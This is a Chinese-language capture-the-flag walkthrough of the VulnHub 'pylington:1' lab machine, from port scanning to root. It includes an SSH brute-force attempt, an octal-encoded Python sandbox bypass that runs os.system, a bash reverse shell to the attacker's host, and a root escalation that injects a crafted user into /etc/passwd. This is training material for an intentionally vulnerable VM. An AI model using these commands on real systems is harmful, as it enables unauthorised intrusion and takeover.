靶机实战-vuluhub系列-pylington:1

简介: 靶机实战-vuluhub系列-pylington:1

下载地址

https://www.vulnhub.com/entry/pylington-1,684/

环境搭建

VirtualBox,vmware

靶机pylington:1:192.168.56.105

kali:192.168.56.102

信息收集

存活IP扫描(py脚本扫描)

640.png

发现靶机的IP为192.168.56.105

端口扫描(Nmap)


nmap -sS -sV -T5 -A 192.168.56.105 -sS:Tcp SYN Scan (sS),半开放扫描,非三次握手的TCP扫描-sV:版本检测,扫描目标主机和端口上运行的软件的版本-T [0-6]:设置定时模板(越高越快),越高越容易被IDS、防火墙检测屏蔽掉-A:综合扫描

640.png

开放端口:22端口和80端口

22端口

使用hydra进行爆破,没有爆破出账号密码

640.png

80端口

查看源代码没有发现有价值的信息

640.png

有个注册页面,无法注册,登录页面经过尝试不存在sql注入

640.png

查看robots.txt,发现三个目录,进行查看

640.png

/zbir7mn240soxhicso2z页面获取到一个用户名密码

640.png

使用发现的账号密码进行登录,成功登录

640.png

点击welcome back,stevel 出现pythonIDE

640.png

点击在此获得得到python文件进行查看


640.png

发现不能出现import,os,open,否则就会检测到恶意

    def check_if_safe(code: str) -> bool:  #-> 描述函数的返回类型,从而方便开发人员使用,code:str,输入的只能是str类型    if 'import' in code: # import is too dangerous        return False    elif 'os' in code: # os is too dangerous        return False    elif 'open' in code: # opening files is also too dangerous        return False    else:        return True
    print(check_if_safe(code='import os'))


    640.png

    提示沙盒检测到恶意程序

    漏洞利用

    命令执行获取shell


    Bypass python sandboxes

    https://book.hacktricks.xyz/misc/basic-python/bypass-python-sandboxes#executing-python-code

    640.png

    经过测试,使用__import__()函数把数据八进制可以绕过成功执行命令

    使用解码解密工具进行转化

    640.png

    在program中输入:

    exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")


    成功执行了ls命令640.png

    kali nc监听

    640.png

    Bash反弹shell:bash -i >& /dev/tcp/192.168.56.102/12340>&1

    640.png

    获得shell

    640.png

    提权

    获取一个可交互式的shell


      python -c 'import pty; pty.spawn("/bin/sh")'


      在用户py目录下发现可运行文件typing

      406505610a6af9d5622bfd9597b33f53.png


      运行后提示输入the quick brown fox jumps over thelazy dog后得到密码54ezhCGaJV

      e7407f012bc351ca488888c8258c589b.png

      ssh连接进行登录py用户,查看user.txt得到第一个flag

      58bc14390f98b474029bd1083589ce31.png

      在Secret_stuff目录下的backup.cc文件进行查看

      5935448e1d86fb54c5efb6de1adb35b8.png

      发现有备份文件的功能,可以利用将账号密码写入到/etc/passwd里面获得root权限

      使用mkpasswd查看本机的当前密码


      mkpasswd -m sha-512

      1a650f677309087849370d801d190451.png


      根据/etc/passwd编辑一个具有root权限的用户


      lemonlove:$6$PX/xRZ043jtDQv1l$F4sTC8J3QHy7EJnHAnUSyHX0zqwjemKCjqaruBxjmlOEKZhWvCoQ9Sn86FDsrVZM8P9vwKrdqGj4OzmZE9q1P1:0:0:root:/root:/bin/bash


      接着执行backup进行备份到/etc/passwd

      f8cb282a4ad0a969bfe2c43fbb619641.png


      备份完成后查看passwd文件发现已经添加成功

      ffe76332c0c640427eef59aef2f3c602.png

      切换到lemonlove账号,进入到root目录获取到第二个flag

      b67feb0fbae276dea45375706b4768fa.png

      解码解密工具


      相关文章
      |
      安全 搜索推荐 Shell
      看完这篇 教你玩转渗透测试靶机vulnhub——DC7
      看完这篇 教你玩转渗透测试靶机vulnhub——DC7
      522 0
      看完这篇 教你玩转渗透测试靶机vulnhub——DC7
      |
      SQL 安全 搜索推荐
      靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
      靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
      靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
      |
      11月前
      |
      安全 Shell
      vulnhub靶场—matrix-breakout-2-morpheus靶机
      vulnhub靶场—matrix-breakout-2-morpheus靶机
      148 2
      |
      安全 Shell 数据库
      Vulnhub靶机DC-1渗透笔记
      关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
      107 2
      Vulnhub靶机DC-1渗透笔记
      |
      存储 SQL 安全
      VulnHub靶机DC3渗透笔记
      Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
      130 1
      VulnHub靶机DC3渗透笔记
      |
      存储 网络协议 网络安全
      VulnHub靶机DC2渗透测试笔记
      靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
      84 0
      VulnHub靶机DC2渗透测试笔记
      |
      SQL 安全 Shell
      看完这篇 教你玩转渗透测试靶机vulnhub——DC3
      看完这篇 教你玩转渗透测试靶机vulnhub——DC3
      327 0
      |
      安全 Shell Linux
      vulnhub靶机系列之zico2
      vulnhub靶机系列之zico2
      |
      SQL 安全 Shell
      靶机实战-vuluhub系列-Me-and-My-girlfriend-1
      靶机实战-vuluhub系列-Me-and-My-girlfriend-1
      靶机实战-vuluhub系列-Me-and-My-girlfriend-1
      |
      安全 Shell 网络安全
      Vulnhub-Gigachad靶机复现(二)
      Vulnhub-Gigachad靶机复现
      143 0
      Vulnhub-Gigachad靶机复现(二)